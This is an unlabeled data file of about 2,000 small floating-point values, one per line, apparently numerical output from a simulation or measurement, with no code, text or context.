0.000899453
0.000903591
0.000903649
0.000899418
0.000908171
0.000903656
0.000886093
0.000890609
0.000890596
0.000894882
0.000894882
0.000894886
0.000890599
0.000890599
0.000886062
0.000881887
0.000886091
0.00088183
0.000886026
0.000886087
0.000881856
0.000886061
0.00088189
0.000886089
0.000881829
0.000886086
0.000886028
0.000881854
0.000890641
0.000894869
0.000894807
0.000890613
0.000890673
0.000894843
0.000890613
0.00089064
0.000894869
0.000894805
0.00089061
0.000894843
0.000890613
0.000890671
0.000886104
0.000881816
0.000881815
0.0008861
0.0008861
0.000881812
0.00088609
0.000890605
0.000903662
0.000903643
0.000899399
0.000899384
0.000903647
0.000903659
0.000899384
0.00090817
0.000912448
0.000908177
0.000908169
0.000912449
0.00090817
0.000908189
0.000912432
0.000912448
0.000908185
0.000912448
0.000908172
0.000903663
0.000899384
0.000903651
0.000903662
0.000899385
0.000903663
0.000903643
0.0008994
0.000899386
0.000903647
0.00090366
0.000899387
0.000908171
0.000912446
0.00090818
0.000912447
0.000908172
0.00090817
0.000908187
0.000912431
0.000912445
0.000912447
0.000908186
0.000908171
0.000903666
0.000899388
0.000903654
0.000903665
0.000899389
0.000890594
0.000894859
0.000894873
0.000890616
0.000894875
0.000890611
0.000890597
0.000886094
0.000886084
0.000881822
0.000886094
0.000881824
0.000890597
0.000894875
0.000890608
0.000894876
0.000890597
0.000886089
0.000886078
0.00088184
0.000881831
0.00088608
0.000886088
0.000881827
0.000890604
0.000894862
0.000894876
0.000890617
0.00089488
0.000890617
0.000890603
0.000886099
0.000886088
0.000881821
0.000886097
0.000881822
0.000890604
0.00089488
0.000890612
0.000894882
0.000890603
0.000886099
0.000886078
0.000881836
0.000881827
0.000886082
0.000886096
0.000881823
0.000908169
0.000903652
0.000908174
0.000903659
0.000890596
0.000894883
0.000894884
0.000894887
0.000890599
0.0008906
0.000886061
0.000881888
0.000886089
0.00088183
0.000881855
0.000886027
0.000886086
0.000886062
0.000881889
0.000886091
0.000881829
0.000881854
0.000886027
0.000886087
0.000890639
0.000894868
0.000894804
0.000890609
0.000894842
0.000890669
0.000890613
0.00089064
0.00089487
0.000894804
0.00089061
0.000894843
0.00089067
0.000890613
0.000886104
0.000881815
0.000881815
0.000881812
0.0008861
0.000886101
0.000886092
0.000890606
0.000886093
0.000890607
0.000873041
0.000868524
0.000873039
0.000868524
0.000868533
0.000864247
0.000864247
0.00086853
0.00086853
0.000864245
0.000873071
0.00087724
0.000877302
0.000873044
0.000877276
0.000873045
0.000873104
0.00087307
0.00087724
0.000877301
0.000873042
0.000877275
0.000873043
0.000873103
0.000873026
0.000877316
0.000877315
0.000877319
0.00087303
0.000873029
0.000868491
0.000864262
0.000868521
0.000864322
0.000868516
0.000864287
0.000868462
0.00086849
0.000864262
0.00086852
0.000864321
0.000868516
0.000864287
0.00086846
0.000850957
0.000855473
0.00085096
0.000855476
0.000855463
0.00085975
0.00085975
0.000859754
0.000855466
0.000855466
0.000850928
0.000846755
0.000850955
0.000846696
0.000850953
0.000850896
0.000846722
0.000850929
0.000846757
0.000850958
0.000846696
0.000850953
0.000850896
0.000846722
0.000855506
0.000859737
0.000859674
0.000855478
0.000859712
0.00085548
0.000855539
0.000855506
0.000859736
0.000859674
0.00085548
0.000859711
0.000855481
0.000855538
0.00085097
0.000846682
0.000846682
0.000850966
0.000850967
0.00084668
0.000868532
0.000868516
0.000864259
0.000864268
0.000868531
0.000868516
0.000864256
0.000873037
0.000877312
0.000873045
0.000877314
0.000873036
0.000873036
0.000873056
0.000877312
0.000877296
0.000873039
0.000877313
0.000873049
0.000868533
0.000864255
0.00086852
0.000868532
0.000864256
0.00085547
0.000859747
0.00085973
0.000855491
0.000859747
0.000855474
0.000855484
0.000850964
0.000850951
0.000846686
0.000846687
0.000850963
0.000855469
0.000859745
0.000855478
0.000859746
0.00085547
0.000850965
0.000850947
0.000846691
0.000846702
0.000846688
0.000850964
0.000850949
0.000855472
0.000859749
0.000859731
0.000855491
0.000859749
0.000855476
0.000855486
0.000850965
0.000850952
0.000846686
0.000850963
0.000846688
0.000855471
0.000859749
0.000855479
0.000859749
0.000855471
0.000850966
0.000850949
0.000846691
0.000846701
0.000850965
0.000850951
0.000846688
0.000868535
0.00086425
0.00086425
0.000868533
0.000868533
0.000864246
0.000873071
0.000877239
0.000877303
0.000873043
0.000873046
0.000877277
0.000873102
0.000873072
0.00087724
0.000877305
0.000873046
0.000873103
0.000877277
0.000873048
0.00087303
0.000877318
0.000877318
0.000873032
0.000877321
0.000873033
0.000868492
0.000864263
0.000868522
0.000864321
0.000868518
0.00086846
0.000864286
0.000868492
0.000864263
0.000868524
0.000864323
0.000868461
0.000868519
0.000864287
0.000873042
0.000868527
0.000850956
0.000855473
0.000855464
0.000859752
0.000859753
0.000859755
0.000855466
0.000855468
0.000850928
0.000846756
0.000850955
0.000846696
0.000850896
0.000850952
0.000846722
0.000850928
0.000846757
0.000850957
0.000846695
0.000850953
0.000850896
0.000846721
0.000855508
0.000859738
0.000859673
0.000855478
0.00085554
0.000859711
0.00085548
0.000855507
0.000859739
0.000859674
0.000855481
0.000859712
0.000855483
0.000855539
0.00085097
0.000846681
0.000846681
0.000850966
0.000850967
0.000846678
0.00085096
0.000855477
0.000868532
0.000868514
0.000864257
0.000864269
0.00086853
0.000868516
0.000864256
0.000873038
0.000877313
0.000873046
0.000877316
0.000873036
0.000873037
0.000873054
0.000877312
0.000877296
0.000873038
0.000877313
0.000873052
0.000868532
0.000864255
0.000868521
0.000868529
0.000864257
0.000855472
0.00085973
0.000859747
0.000855489
0.000859747
0.000855485
0.000855475
0.000850967
0.000850955
0.000846691
0.000846692
0.000850966
0.000855471
0.000859747
0.000855481
0.000859748
0.00085547
0.000850968
0.000850949
0.000846705
0.000846695
0.000846693
0.000850951
0.000850967
0.000855474
0.000859748
0.000859732
0.000855489
0.00085975
0.000855476
0.000855488
0.000850968
0.000850955
0.000846691
0.000850967
0.000846693
0.000855473
0.000859748
0.000855482
0.00085975
0.000855472
0.00085097
0.000850949
0.000846696
0.000846707
0.000850967
0.000850954
0.000846694
0.000868532
0.000868514
0.000864269
0.000864259
0.000868515
0.000868531
0.000864256
0.00087304
0.000877317
0.000873049
0.000873039
0.000877318
0.000873037
0.000873057
0.000877301
0.000877317
0.000873051
0.000877316
0.000873042
0.000868534
0.000864257
0.000868523
0.000868533
0.000864258
0.000868533
0.000868517
0.000864259
0.000864271
0.000868532
0.00086852
0.000864257
0.000873037
0.000877313
0.000873047
0.000877315
0.000873035
0.000873037
0.000873059
0.000877315
0.000877297
0.000877315
0.00087304
0.000873052
0.000868533
0.000864256
0.000868522
0.000868531
0.000864257
0.000855474
0.000859734
0.00085975
0.000855491
0.00085975
0.000855487
0.000855477
0.000850969
0.000850955
0.00084669
0.000850968
0.000846692
0.000855475
0.000859751
0.000855482
0.000859752
0.000855474
0.000850968
0.000850951
0.000846707
0.000846693
0.000850953
0.000850967
0.000846692
0.000855474
0.00085975
0.000859733
0.000855495
0.00085975
0.000855478
0.000855488
0.00085097
0.000850957
0.000846691
0.000850969
0.000846693
0.000855475
0.000859751
0.000855482
0.000859751
0.000855474
0.00085097
0.000850954
0.000846694
0.000846708
0.000850969
0.000850956
0.000846692
0.000868538
0.000864253
0.000864253
0.000868535
0.000868536
0.00086425
0.000873071
0.000877241
0.000877301
0.000873044
0.000873046
0.000877276
0.000873105
0.000873073
0.000877243
0.000877302
0.000873046
0.000873105
0.000877276
0.000873047
0.000873029
0.000877316
0.000877316
0.000873033
0.000877318
0.000873033
0.000868493
0.000864267
0.000868524
0.000864323
0.000868521
0.000868461
0.00086429
0.000868494
0.000864266
0.000868526
0.000864325
0.000868462
0.000868521
0.000864291
0.000873043
0.000868528
0.000850961
0.000855477
0.000855469
0.000859755
0.000859755
0.000859759
0.000855472
0.000855472
0.000850932
0.000846757
0.000850959
0.0008467
0.000850897
0.000850957
0.000846725
0.000850933
0.00084676
0.000850961
0.0008467
0.000850958
0.0008509
0.000846725
0.000855512
0.000859741
0.000859675
0.000855481
0.000855542
0.000859714
0.000855485
0.000855512
0.000859741
0.000859678
0.000855482
0.000859715
0.000855486
0.000855544
0.000850976
0.000846686
0.000846686
0.000850972
0.000850972
0.000846683
0.000850962
0.000855478
0.000868533
0.000868514
0.000864271
0.000864258
0.000868519
0.00086853
0.000864257
0.000873041
0.000877318
0.00087305
0.00087304
0.000877319
0.000873041
0.000873058
0.000877304
0.000877323
0.000873055
0.000877322
0.000873043
0.000868534
0.000864256
0.000868524
0.000868534
0.000864257
0.000868525
0.000868511
0.000864268
0.00086425
0.000868513
0.000868524
0.00086425
0.000873034
0.000877311
0.000873043
0.000877313
0.000873033
0.000873035
0.000873056
0.000877296
0.000877317
0.000877314
0.00087305
0.00087304
0.000868529
0.000864253
0.000868518
0.000868527
0.000864254
0.000855476
0.000859733
0.000859753
0.000855495
0.000859751
0.000855489
0.000855481
0.000850971
0.000850957
0.000846693
0.000850969
0.000846695
0.000855476
0.00085975
0.000855483
0.000859751
0.000855474
0.000850971
0.000850953
0.000846708
0.000846694
0.000850954
0.00085097
0.000846695
0.000855483
0.000859738
0.000859756
0.000855496
0.000859758
0.000855492
0.000855485
0.00085097
0.000850959
0.000846691
0.000850969
0.000846692
0.000855478
0.000859751
0.000855485
0.000859753
0.000855476
0.000850973
0.000850955
0.000846706
0.000846694
0.000850954
0.000850971
0.000846694
0.000873041
0.000868527
0.000873038
0.000868524
0.000855466
0.000859753
0.000859753
0.000859757
0.000855468
0.000855469
0.00085093
0.000846759
0.000850959
0.0008467
0.000846726
0.000850899
0.000850955
0.000850931
0.000846759
0.000850961
0.000846701
0.000846726
0.000850899
0.000850955
0.000855508
0.000859739
0.000859676
0.000855479
0.000859713
0.000855541
0.000855483
0.000855509
0.000859739
0.000859675
0.000855482
0.000859713
0.00085554
0.000855483
0.000850972
0.000846685
0.000846685
0.000846683
0.000850969
0.000850969
0.000850962
0.000855477
0.000850963
0.000855478
0.000837907
0.000833394
0.000837911
0.000833396
0.000833404
0.000829119
0.00082912
0.0008334
0.000833401
0.000829116
0.000837938
0.000842109
0.000842169
0.00083791
0.000842144
0.000837912
0.000837973
0.000837939
0.000842109
0.000842171
0.000837914
0.000842144
0.000837915
0.000837972
0.000837895
0.000842183
0.000842184
0.000842187
0.000837898
0.000837899
0.000833362
0.000829133
0.000833391
0.000829192
0.000833386
0.000829158
0.000833331
0.000833364
0.000829134
0.000833394
0.000829193
0.000833389
0.000829159
0.000833331
0.00081583
0.000820345
0.000815833
0.000820348
0.000820336
0.000824622
0.000824623
0.000824627
0.000820338
0.000820339
0.000815803
0.000811628
0.000815829
0.00081157
0.000815825
0.000815768
0.000811596
0.000815803
0.00081163
0.000815831
0.000811571
0.000815826
0.00081577
0.000811597
0.000820379
0.000824608
0.000824544
0.000820349
0.000824582
0.000820352
0.00082041
0.00082038
0.00082461
0.000824545
0.000820351
0.000824583
0.000820354
0.000820412
0.000815844
0.000811556
0.000811556
0.000815839
0.00081584
0.000811553
0.000833397
0.000833377
0.000829121
0.000829133
0.000833393
0.000833379
0.000829121
0.000837901
0.000842177
0.000837911
0.000842179
0.000837899
0.000837902
0.00083792
0.00084218
0.00084216
0.000837904
0.00084218
0.000837914
0.000833397
0.00082912
0.000833387
0.000833395
0.000829122
0.00082034
0.000824613
0.0008246
0.000820356
0.000824616
0.000820341
0.000820354
0.000815837
0.000815825
0.000811558
0.000811559
0.000815836
0.000820342
0.000824618
0.000820351
0.000824619
0.000820343
0.000815835
0.000815816
0.00081156
0.000811573
0.000811559
0.000815833
0.00081582
0.000820341
0.000824613
0.000824598
0.000820356
0.000824616
0.000820342
0.000820354
0.000815836
0.000815824
0.000811559
0.000815835
0.000811561
0.000820341
0.000824617
0.00082035
0.000824617
0.000820341
0.000815838
0.000815817
0.000811561
0.000811574
0.000815833
0.000815821
0.000811562
0.000833405
0.000829118
0.000829119
0.000833401
0.000833401
0.000829116
0.00083794
0.000842108
0.000842169
0.00083791
0.000837914
0.000842144
0.000837972
0.00083794
0.000842109
0.000842169
0.000837911
0.000837972
0.000842143
0.000837914
0.000837896
0.000842182
0.000842183
0.000837899
0.000842186
0.000837899
0.000833362
0.000829132
0.000833391
0.000829192
0.000833388
0.000833329
0.000829158
0.000833363
0.000829133
0.000833392
0.00082919
0.000833328
0.000833388
0.000829158
0.000837908
0.000833394
0.000815829
0.000820345
0.000820335
0.00082462
0.000824621
0.000824624
0.000820337
0.000820337
0.0008158
0.000811626
0.000815827
0.000811566
0.000815765
0.000815824
0.000811591
0.0008158
0.000811625
0.000815828
0.000811568
0.000815825
0.000815765
0.000811592
0.00082038
0.000824606
0.000824544
0.00082035
0.000820409
0.000824582
0.000820352
0.000820379
0.000824607
0.000824543
0.000820349
0.000824582
0.000820351
0.000820409
0.000815842
0.000811553
0.000811553
0.000815838
0.000815839
0.00081155
0.00081583
0.000820345
0.000833407
0.000833391
0.000829134
0.000829145
0.000833407
0.00083339
0.000829132
0.00083791
0.000842184
0.000837917
0.000842187
0.000837909
0.000837911
0.000837928
0.000842187
0.000842168
0.000837915
0.000842187
0.000837923
0.000833406
0.00082913
0.000833393
0.000833404
0.00082913
0.000820346
0.000824608
0.000824622
0.000820364
0.000824623
0.000820361
0.000820347
0.000815841
0.000815829
0.000811565
0.000811565
0.00081584
0.000820346
0.000824621
0.000820354
0.000824622
0.000820345
0.000815841
0.000815822
0.000811578
0.000811565
0.000811564
0.000815824
0.000815838
0.000820349
0.000824623
0.000824609
0.000820364
0.000824625
0.00082035
0.000820364
0.000815842
0.000815829
0.000811565
0.000815841
0.000811565
0.000820347
0.000824624
0.000820355
0.000824624
0.000820348
0.000815842
0.000815825
0.000811565
0.000811582
0.000815839
0.00081583
0.000811565
0.000833399
0.000833382
0.000829137
0.000829123
0.000833384
0.000833398
0.000829122
0.000837905
0.000842181
0.000837913
0.000837903
0.000842183
0.000837905
0.000837924
0.000842168
0.000842182
0.000837919
0.000842183
0.000837908
0.000833399
0.000829121
0.000833389
0.000833398
0.000829123
0.0008334
0.000833381
0.000829125
0.000829137
0.000833398
0.000833385
0.000829124
0.000837907
0.000842183
0.000837916
0.000842185
0.000837906
0.000837906
0.000837922
0.000842181
0.000842169
0.000842184
0.000837907
0.000837922
0.000833401
0.000829122
0.000833389
0.000833399
0.000829125
0.000820339
0.0008246
0.000824613
0.000820355
0.000824616
0.000820354
0.00082034
0.000815834
0.000815824
0.000811557
0.000815834
0.000811558
0.000820339
0.000824616
0.00082035
0.000824616
0.000820339
0.000815835
0.000815816
0.000811573
0.00081156
0.000815823
0.000815832
0.000811558
0.000820342
0.000824616
0.000824601
0.000820355
0.000824619
0.000820342
0.000820352
0.000815837
0.000815826
0.000811559
0.000815836
0.00081156
0.000820342
0.000824618
0.00082035
0.000824619
0.000820341
0.000815837
0.000815814
0.000811561
0.000811573
0.000815833
0.000815819
0.00081156
0.00083341
0.000829124
0.000829124
0.000833406
0.000833407
0.000829121
0.000837944
0.000842111
0.000842172
0.000837916
0.000837918
0.000842147
0.000837976
0.000837946
0.000842113
0.000842173
0.000837918
0.000837974
0.000842148
0.00083792
0.000837901
0.000842186
0.000842186
0.000837903
0.00084219
0.000837904
0.000833367
0.000829138
0.000833395
0.000829196
0.000833392
0.000833333
0.000829163
0.000833368
0.000829138
0.000833398
0.000829194
0.000833331
0.000833394
0.000829164
0.000837915
0.0008334
0.000815832
0.000820349
0.000820339
0.000824626
0.000824626
0.00082463
0.000820341
0.000820341
0.000815806
0.000811632
0.000815831
0.000811571
0.000815772
0.000815827
0.000811598
0.000815804
0.00081163
0.00081583
0.00081157
0.000815827
0.00081577
0.000811596
0.000820384
0.000824613
0.000824547
0.000820354
0.000820415
0.000824586
0.000820356
0.000820383
0.000824612
0.000824547
0.000820353
0.000824586
0.000820356
0.000820413
0.000815845
0.000811557
0.000811556
0.000815842
0.000815841
0.000811554
0.000815833
0.000820349
0.000833402
0.000833382
0.00082914
0.000829124
0.000833387
0.000833398
0.000829126
0.000837909
0.000842186
0.000837919
0.000837908
0.000842188
0.000837908
0.000837927
0.000842169
0.000842183
0.000837922
0.000842187
0.000837909
0.000833404
0.000829127
0.000833393
0.000833403
0.000829129
0.000833398
0.000833379
0.000829132
0.000829121
0.000833382
0.000833396
0.000829121
0.000837907
0.000842184
0.000837915
0.000842185
0.000837906
0.000837906
0.000837924
0.000842166
0.000842184
0.000842184
0.000837921
0.000837908
0.000833399
0.000829121
0.000833386
0.000833397
0.000829122
0.000820346
0.000824603
0.000824616
0.00082036
0.000824621
0.000820358
0.000820345
0.000815842
0.000815829
0.000811564
0.000815841
0.000811565
0.000820346
0.000824623
0.000820356
0.000824623
0.000820346
0.000815842
0.000815822
0.00081158
0.000811567
0.000815826
0.000815838
0.000811566
0.000820341
0.000824597
0.000824614
0.000820359
0.000824615
0.000820354
0.000820344
0.000815835
0.000815824
0.000811559
0.000815833
0.000811561
0.00082034
0.000824616
0.00082035
0.000824617
0.00082034
0.000815837
0.000815822
0.000811575
0.000811565
0.00081582
0.000815837
0.000811562
0.000837911
0.000833394
0.000837911
0.000833392
0.000820333
0.00082462
0.00082462
0.000824623
0.000820336
0.000820336
0.0008158
0.000811628
0.000815828
0.000811569
0.000811594
0.000815767
0.000815825
0.000815799
0.000811629
0.000815827
0.000811568
0.000811595
0.000815767
0.000815824
0.000820376
0.000824606
0.000824543
0.000820349
0.000824581
0.000820408
0.000820351
0.000820375
0.000824605
0.000824545
0.000820346
0.00082458
0.00082041
0.00082035
0.000815843
0.000811554
0.000811554
0.000811552
0.000815839
0.000815838
0.00081583
0.000820344
0.000815829
0.000820343
0.000802782
0.000798266
0.000802785
0.000798269
0.000798278
0.000793991
0.000793991
0.000798275
0.000798275
0.000793988
0.000802814
0.00080698
0.000807044
0.000802786
0.00080702
0.000802788
0.000802842
0.000802814
0.000806983
0.000807045
0.000802788
0.00080702
0.000802789
0.000802847
0.00080277
0.000807058
0.000807058
0.000807061
0.000802774
0.000802774
0.000798234
0.000794005
0.000798264
0.000794062
0.00079826
0.000794029
0.000798201
0.000798235
0.000794005
0.000798267
0.000794066
0.000798262
0.000794029
0.000798204
0.000780704
0.000785217
0.000780706
0.00078522
0.000785206
0.000789493
0.000789493
0.000789497
0.000785209
0.000785209
0.000780674
0.000776502
0.000780701
0.000776441
0.000780696
0.000780641
0.000776468
0.000780675
0.000776504
0.000780704
0.000776443
0.000780699
0.000780642
0.000776469
0.00078525
0.00078948
0.000789415
0.00078522
0.000789453
0.000785223
0.000785281
0.000785251
0.000789479
0.00078942
0.000785223
0.000789453
0.000785224
0.000785285
0.000780714
0.000776427
0.000776428
0.00078071
0.000780711
0.000776424
0.000798271
0.000798256
0.000793998
0.000794012
0.000798271
0.000798259
0.000793996
0.000802776
0.000807055
0.000802785
0.000807055
0.000802777
0.000802776
0.000802797
0.000807052
0.000807036
0.00080278
0.000807054
0.000802793
0.00079827
0.000793994
0.00079826
0.00079827
0.000793995
0.000785214
0.000789488
0.000789472
0.000785231
0.000789489
0.000785216
0.000785228
0.000780711
0.000780699
0.000776434
0.00078071
0.000776434
0.000785214
0.000789488
0.000785222
0.00078949
0.000785214
0.00078071
0.000780694
0.000776435
0.000776449
0.000780708
0.000780695
0.000776434
0.000785213
0.000789488
0.000789475
0.00078523
0.000789489
0.000785214
0.000785229
0.000780708
0.000780699
0.00077643
0.000780707
0.000776431
0.000785213
0.000789489
0.000785223
0.000789489
0.000785213
0.000780708
0.000780692
0.000776433
0.000776445
0.000780705
0.000780694
0.000776431
0.000798274
0.000793989
0.000793988
0.000798271
0.000798271
0.000793985
0.00080281
0.000806979
0.00080704
0.000802783
0.000802784
0.000807013
0.000802843
0.000802809
0.000806979
0.00080704
0.00080278
0.000802842
0.000807014
0.000802783
0.000802765
0.000807054
0.000807054
0.000802769
0.000807057
0.000802769
0.000798234
0.000794004
0.000798263
0.000794061
0.000798258
0.0007982
0.000794029
0.000798233
0.000794002
0.00079826
0.000794062
0.0007982
0.000798256
0.000794028
0.000802777
0.000798262
0.000780703
0.000785217
0.000785206
0.000789493
0.000789492
0.000789495
0.000785209
0.000785209
0.000780672
0.0007765
0.0007807
0.00077644
0.000780637
0.000780698
0.000776466
0.000780672
0.000776501
0.0007807
0.000776441
0.000780696
0.00078064
0.000776467
0.00078525
0.000789479
0.000789413
0.000785221
0.00078528
0.000789451
0.000785224
0.000785249
0.000789477
0.000789415
0.00078522
0.000789451
0.000785222
0.000785282
0.000780714
0.000776426
0.000776427
0.000780711
0.000780711
0.000776423
0.000780704
0.000785217
0.000798273
0.000798255
0.000794
0.000794011
0.000798272
0.000798258
0.000793998
0.00080278
0.000807056
0.000802789
0.000807058
0.00080278
0.000802778
0.000802796
0.000807055
0.000807041
0.000802781
0.000807056
0.000802794
0.000798274
0.000793995
0.000798262
0.000798271
0.000793998
0.00078522
0.000789476
0.000789493
0.000785232
0.000789495
0.000785232
0.000785221
0.000780715
0.000780702
0.000776437
0.000780714
0.000776439
0.00078522
0.000789493
0.000785225
0.000789495
0.000785218
0.000780716
0.000780695
0.000776453
0.00077644
0.0007807
0.000780712
0.00077644
0.000785217
0.000789492
0.000789476
0.000785235
0.000789493
0.00078522
0.00078523
0.000780713
0.0007807
0.000776436
0.000780712
0.000776436
0.000785217
0.000789491
0.000785225
0.000789493
0.000785217
0.000780713
0.000780697
0.000776439
0.00077645
0.000780713
0.000780696
0.000776437
0.000798269
0.000798256
0.000794008
0.000793997
0.000798254
0.000798268
0.000793995
0.000802773
0.000807048
0.000802782
0.000802772
0.00080705
0.000802773
0.000802796
0.000807033
0.000807049
0.000802787
0.00080705
0.000802776
0.000798269
0.000793994
0.000798256
0.000798268
0.000793995
0.000798271
0.000798256
0.000793997
0.000794009
0.000798269
0.000798255
0.000793996
0.000802776
0.000807052
0.000802784
0.000807054
0.000802775
0.000802776
0.000802797
0.000807051
0.000807037
0.000807053
0.000802777
0.000802791
0.000798272
0.000793995
0.00079826
0.00079827
0.000793997
0.000785216
0.000789474
0.000789489
0.000785234
0.000789491
0.00078523
0.000785218
0.000780713
0.0007807
0.000776436
0.000780713
0.000776438
0.000785217
0.000789491
0.000785225
0.000789492
0.000785217
0.000780713
0.000780695
0.00077645
0.000776438
0.000780697
0.000780711
0.000776437
0.000785215
0.000789489
0.000789473
0.000785232
0.000789491
0.000785217
0.000785226
0.000780711
0.000780699
0.000776435
0.00078071
0.000776435
0.000785215
0.000789491
0.000785224
0.000789492
0.000785214
0.000780711
0.000780694
0.000776438
0.00077645
0.00078071
0.000780695
0.000776435
0.000798277
0.000793993
0.000793992
0.000798275
0.000798275
0.000793989
0.000802814
0.000806983
0.000807044
0.000802787
0.000802788
0.000807019
0.000802847
0.000802813
0.000806982
0.000807044
0.000802786
0.000802845
0.000807018
0.000802788
0.00080277
0.000807058
0.000807058
0.000802774
0.00080706
0.000802773
0.000798234
0.000794007
0.000798264
0.000794067
0.00079826
0.000798205
0.000794029
0.000798234
0.000794005
0.000798265
0.000794065
0.000798202
0.000798261
0.000794029
0.000802782
0.000798266
0.000780705
0.000785221
0.00078521
0.000789497
0.000789495
0.000789499
0.000785213
0.000785212
0.000780676
0.000776504
0.000780704
0.000776444
0.000780642
0.0007807
0.000776471
0.000780676
0.000776504
0.000780703
0.000776444
0.000780699
0.000780642
0.000776471
0.000785254
0.000789483
0.000789417
0.000785226
0.000785284
0.000789455
0.000785228
0.000785252
0.00078948
0.000789417
0.000785222
0.000789453
0.000785225
0.000785284
0.000780717
0.00077643
0.000776429
0.000780714
0.000780713
0.000776427
0.000780704
0.000785218
0.000798273
0.000798253
0.000794007
0.000793999
0.000798256
0.000798272
0.000793996
0.000802779
0.000807056
0.000802789
0.000802778
0.000807057
0.000802779
0.000802796
0.00080704
0.000807057
0.000802794
0.000807057
0.000802783
0.000798273
0.000793993
0.000798262
0.000798271
0.000793996
0.000798275
0.000798255
0.000794012
0.000794
0.000798258
0.000798272
0.000794001
0.000802779
0.000807054
0.000802789
0.000807056
0.000802778
0.000802779
0.000802794
0.000807037
0.000807055
0.000807056
0.000802793
0.000802781
0.000798275
0.000793998
0.000798263
0.000798272
0.000794001
0.000785214
0.000789471
0.00078949
0.000785231
0.00078949
0.000785229
0.000785218
0.00078071
0.000780699
0.000776435
0.000780709
0.000776436
0.000785214
0.000789488
0.000785221
0.00078949
0.000785213
0.000780712
0.000780696
0.000776455
0.000776441
0.000780698
0.000780712
0.000776437
0.000785221
0.000789476
0.000789491
0.000785232
0.000789495
0.000785234
0.000785221
0.000780717
0.000780703
0.000776439
0.000780715
0.00077644
0.000785223
0.000789496
0.00078523
0.000789498
0.000785222
0.000780716
0.000780696
0.000776455
0.000776441
0.0007807
0.000780713
0.00077644
0.000802781
0.000798265
0.000802783
0.000798268
0.000785209
0.000789495
0.000789495
0.000789498
0.000785212
0.000785213
0.000780675
0.000776506
0.000780703
0.000776446
0.000780643
0.000780699
0.000776473
0.000780677
0.000776505
0.000780705
0.000776446
0.000780642
0.000780701
0.000776473
0.000785251
0.00078948
0.000789415
0.000785222
0.000789454
0.000785283
0.000785225
0.000785252
0.000789482
0.000789415
0.000785225
0.000789455
0.000785281
0.000785228
0.000780717
0.000776432
0.000776431
0.000780714
0.000780714
0.000776429
0.000780705
0.000785219
0.000780708
0.000785223
0.00164755
0.00164755
0.00163875
0.00163875
0.00163875
0.00163875
0.00164755
0.0016455
0.00164932
0.00164932
0.00164594
0.00164568
0.00164567
0.00164946
0.00161237
0.00161237
0.00160359
0.00160358
0.00160358
0.00160358
0.00161237
0.00161034
0.00161415
0.00161415
0.00161076
0.00161429
0.0016105
0.0016105
0.00157724
0.00157724
0.00156847
0.00156847
0.00156847
0.00156846
0.00157724
0.00157522
0.00157903
0.00157903
0.00157564
0.00157917
0.00157538
0.00157539
0.00154214
0.00154214
0.00153337
0.00153337
0.00153337
0.00153336
0.00154214
0.00154013
0.00154393
0.00154393
0.00154054
0.00154408
0.00154029
0.00154029
0.00150705
0.00150704
0.00149828
0.00149827
0.00149827
0.00149827
0.00150704
0.00150506
0.00150885
0.00150885
0.00150546
0.00150901
0.00150522
0.00150521
0.00147196
0.00147196
0.00146319
0.00146319
0.00146319
0.00146318
0.00147196
0.00146997
0.00147377
0.00147377
0.00147038
0.00147392
0.00147013
0.00147013
0.00143687
0.00143687
0.00142811
0.0014281
0.0014281
0.0014281
0.00143687
0.00143488
0.00143868
0.00143868
0.00143529
0.00143883
0.00143504
0.00143504
0.00140179
0.00140179
0.00139302
0.00139302
0.00139302
0.00139301
0.00140178
0.0013998
0.00140359
0.00140359
0.0014002
0.00140375
0.00139996
0.00139996
0.00136671
0.00136671
0.00135795
0.00135794
0.00135794
0.00135794
0.00136671
0.00136472
0.00136852
0.00136852
0.00136512
0.00136868
0.00136488
0.00136488
0.00133164
0.00133163
0.00132287
0.00132287
0.00132287
0.00132286
0.00133163
0.00132965
0.00133345
0.00133345
0.00133005
0.0013336
0.00132981
0.00132981
0.00129655
0.00129656
0.00128779
0.00128779
0.00128779
0.00128778
0.00129655
0.00129457
0.00129836
0.00129836
0.00129496
0.00129852
0.00129473
0.00129472
0.00126147
0.00126147
0.0012527
0.0012527
0.0012527
0.00125269
0.00126146
0.00125948
0.00126328
0.00126328
0.00125987
0.00126344
0.00125964
0.00125964
0.00122637
0.00122637
0.00121761
0.0012176
0.0012176
0.00121759
0.00122637
0.00122438
0.00122818
0.00122818
0.00122478
0.00122834
0.00122454
0.00122454
0.00119127
0.00119127
0.0011825
0.0011825
0.0011825
0.00118249
0.00119127
0.00118929
0.00119308
0.00119308
0.00118968
0.00119324
0.00118944
0.00118944
0.00115617
0.00115617
0.0011474
0.00114739
0.00114739
0.00114738
0.00115616
0.00115418
0.00115798
0.00115798
0.00115458
0.00115814
0.00115434
0.00115434
0.00112105
0.00112106
0.00111228
0.00111228
0.00111228
0.00111227
0.00112105
0.00111907
0.00112287
0.00112287
0.00111947
0.00112303
0.00111923
0.00111923
0.00108594
0.00108594
0.00107717
0.00107716
0.00107716
0.00107715
0.00108593
0.00108395
0.00108775
0.00108775
0.00108435
0.00108791
0.00108411
0.00108411
0.00105082
0.00105082
0.00104205
0.00104204
0.00104204
0.00104204
0.00105082
0.00104883
0.00105263
0.00105263
0.00104923
0.00105279
0.00104899
0.00104899
0.0010157
0.0010157
0.00100693
0.00100692
0.00100692
0.00100692
0.0010157
0.00101371
0.00101751
0.00101751
0.00101411
0.00101767
0.00101387
0.00101387
0.000980575
0.000980576
0.000971801
0.000971793
0.000971796
0.000971788
0.00098057
0.000978587
0.000982386
0.000982386
0.000978982
0.000982545
0.000978743
0.000978742
0.000945442
0.000945444
0.00093667
0.00093666
0.000936663
0.000936656
0.000945438
0.000943457
0.000947256
0.000947257
0.000943852
0.000947414
0.000943612
0.000943612
0.000910312
0.000910313
0.000901537
0.000901531
0.000901532
0.000901525
0.000910308
0.000908326
0.000912125
0.000912126
0.000908721
0.000912282
0.000908482
0.000908482
0.00087518
0.000875182
0.000866407
0.000866399
0.000866401
0.000866395
0.000875177
0.000873196
0.000876994
0.000876996
0.000873591
0.000877153
0.00087335
0.000873351
0.000840051
0.000840051
0.000831277
0.000831271
0.00083127
0.000831265
0.000840047
0.000838066
0.000841864
0.000841863
0.000838461
0.000842024
0.000838221
0.00083822
0.000804922
0.000804923
0.000796149
0.000796142
0.000796142
0.000796136
0.000804918
0.000802936
0.000806736
0.000806737
0.000803331
0.000806894
0.000803091
0.000803092
0.00164551
0.00164934
0.00164931
0.00164594
0.00164568
0.00164567
0.00164946
0.00162308
0.0016227
0.00161929
0.00161929
0.00162294
0.00162294
0.00161912
0.0016455
0.00164932
0.00164932
0.00164594
0.00164567
0.00164567
0.00164946
0.00162307
0.0016227
0.00161929
